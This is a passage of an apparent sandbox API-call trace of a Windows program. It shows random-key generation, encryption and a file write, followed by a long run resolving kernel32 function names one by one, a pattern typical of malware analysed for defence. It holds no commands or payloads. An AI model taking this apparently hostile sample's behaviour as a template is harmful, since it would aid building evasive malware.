pbBuffer=0xfb0000) returned 1 [0077.251] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.251] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.251] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0077.251] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0077.252] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.252] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0077.252] CloseHandle (hObject=0x444) returned 1 [0077.252] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.252] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0077.253] CloseHandle (hObject=0x0) returned 0 [0077.253] CloseHandle (hObject=0x440) returned 1 [0077.255] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.255] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.255] GetTickCount () returned 0x114bd28 [0077.255] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.255] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.255] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.256] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.256] lstrlenA (lpString="kernel32.dll") returned 12 [0077.256] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.256] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.256] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.256] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.256] lstrlenA (lpString="ADDATOMA") returned 8 [0077.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.256] lstrlenA (lpString="ADDATOMW") returned 8 [0077.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.256] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.257] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.257] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.257] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.257] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.257] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.257] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.257] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.257] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.257] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.257] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.257] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.257] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.257] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.257] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.257] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.257] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.257] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.257] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.258] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.258] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.258] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.258] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.258] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.258] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.258] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.258] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.258] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.258] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.258] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.258] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.258] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.258] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.258] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.258] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.258] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.258] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.259] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.259] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.259] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.259] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.259] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.259] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.259] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.259] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.259] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.259] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.259] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.259] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.259] lstrlenA (lpString="BEEP") returned 4 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.259] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.259] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.259] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.259] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.259] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.259] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.259] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.260] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.260] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.260] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.260] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.260] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.260] lstrlenA (lpString="CANCELIO") returned 8 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.260] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.260] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.260] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.260] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.260] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.260] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.260] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.260] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.260] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.260] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.260] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.260] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.260] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.261] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.261] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.261] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.261] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.261] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.261] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.261] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.261] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.261] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.261] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.261] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.261] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.261] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.261] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.261] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.261] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.261] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.261] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.261] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.262] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.262] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.262] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.262] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.262] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.262] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.262] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.262] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.262] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.262] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.262] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.262] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.262] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.262] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: 